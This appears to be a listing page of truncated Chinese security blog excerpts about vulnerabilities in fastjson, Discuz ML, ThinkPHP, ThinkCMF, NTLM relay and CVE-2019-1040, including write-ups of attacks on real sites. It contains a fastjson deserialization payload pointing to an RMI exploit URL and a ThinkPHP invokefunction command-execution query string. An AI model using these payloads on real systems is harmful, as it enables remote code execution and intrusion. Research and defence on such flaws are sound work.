poc
{"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"x":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}}}
最近据说爆出来一个在hw期间使用的fastjson 漏洞,该漏洞无需开启autoType即可利用成功,建议使用fastjson的用户尽快升级到> 1.2.47版本(保险起见,建议升级到最新版)
环境准备
阅读本篇文章之...
漏洞分析 | Discuz ML! V3.X 代码注入漏洞
Discuz!ML V3.X 代码注入分析
代码来源:http://discuz.ml/download
作者:Web安全组-CoolCat
漏洞定位
在PoC的代码中填充'.1.'使得代码出错,定位出错代码文件:
代码报错
根据报错跟踪到source/module/portal/portal_index.php第32行
portal_index.php 代码
查看问题函数上方查看定义函数以及关联文件的位置,可以看到template函数在/source/function/function_core.php中,继续跟进。
函数从 524行一...
thinkPHP渗透之经验决定成败
如上图,目标就一个登陆框,最近 Thinkphp 程序很多,根据后台地址结构,猜测可能是 ThinkPHP ,随手输入 xxx 得到 thinkPHP 报错页面,确定目标程序和版本。
然后上 5.X EXP 测试:
命令执行漏洞已经被修复了。。。
爆破?这验证码我没辙。。。
尝试读取日志瞅瞅,结果遇到防火墙
然后查了下 IP ,没有CDN,果断查下旁站,有那么几个站,目测都是 thinkPHP
爱站旁站查询其实并不准确,有的查不到,所以...
thinkPHP 5X 在PHP7以上环境下的 GETSHELL
起因
thinkPHP 的命令执行漏洞已经过去好一阵子了,然而还有许多站并没有修复这个漏洞,今天恰巧让我遇到这么一个,
但是因为目标 PHP 版本是 7.2.14 导致 GETSHELL 变的异常麻烦,在各种折腾下最终成功,记录分享一波~
GETSHELL 过程
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami?s=index/\think\Request/input&filter=phpinfo&...
[漏洞案例]thinkcmf 2.x从sql注入到getshell实战
0X00 前言
这个案例是某项目的漏洞,涉及敏感的地方将会打码。
很久没更新博客了,放一篇上来除除草,新的一年会有所转变,以后会有更多领域的研究。
下面是正文
0X01 正文
某厂商某个网站用的是thinkcmf 2.2.3。
thinkcmf 2.2.3系统是存在漏洞的,参考先知上喵呜师傅写的一篇文章(https://xz.aliyun.com/t/3529 )
文章中提到了三个漏洞,一个注入,两个模板注入写shell。
...
[漏洞分析]thinkcmf 1.6.0版本从sql注入到任意代码执行
0x00 前言
该漏洞源于某真实案例,虽然攻击没有用到该漏洞,但在分析攻击之后对该版本的cmf审计之后发现了,也算是有点机遇巧合的味道,我没去找漏洞,漏洞找上了我XD
thinkcmf 已经非常久远了,该版本看github上的更新时间已经是4年前了,也就是2014年的时候,那时候我没学安全呢。。。
0x01 前台sql注入
前台在登录方法中存在注入,thinkcmf是基于thinkphp3.2写的,直接看
文件application\User\C...
“净网2019”打击网络色情,实录渗透某成人“抖音”
本文作者:曲云杰(MS08067实验室合伙人 & Web小组组长)
起因
经排查发现该app为成人版"抖音",响应国家净网行动,坚决打击非法传播传播淫秽物品行为!
经过
下载该app,并对其进行测试。
使用BurpSuite抓包,环境为:
夜神模拟器(安卓4)+Xpose框架+Just trust me 框架
发现该app是从某web地址:www.xxxxx.com的接口回调过来的。
排查web资产
域名注册信息
Ps:这类网站域名注册信息大部分为虚假...
Remote NTLM relaying through CS
0x00 为什么写这个?
最近在学习Exchange在提权中的应用的时候,碰到一个问题,即:如果我们现在拥有了一个内网的windows主机,如何利用这台主机使用CVE_2018_8581 ?大概的结构是这样:
攻击者通过某种方式获取一台域内主机权限。并获取了此主机的域成员账号密码,在获取DC及Exchange Server的ip地址后,利用CVE_2018_8581
0x01 利用思路
思路一:编译py版的impacket
在做这个的时候,第一想法就是有没...
迂回渗透某APP站点
迂回渗透某APP站点
本文主要从技术角度探讨某次渗透目标拿取数据的过程,不对目标信息做过多描述,未经本人许可,请勿转载。今年开年以来由于各种原因,自己心思也不在渗透上,没怎么搞渗透,除了这次花了比较长时间搞得一个目标外,就是上次护网打了一个垃圾的域了。本文要描述的渗透过程由于断断续续搞了比较长的时间,中间走了不少弯路耽误了不少时间,这也是我第一次在博客发渗透实战类文章,欢迎...
结合CVE-2019-1040漏洞的两种域提权深度利用分析
作者:天融信阿尔法实验室
一、漏洞概述
2019年6月,Microsoft发布了一条安全更新。该更新针对CVE-2019-1040漏洞进行修复。此次漏洞,攻击者可以通过中间人攻击,绕过NTLM MIC(消息完整性检查)保护,将身份验证流量中继到目标服务器。
通过这种攻击使得攻击者在仅有一个普通域账号的情况下可以远程控制 Windows 域内的任何机器,包括域控服务器。
二、漏洞利用
攻击方式一:Exchange
验证环境:
角色
...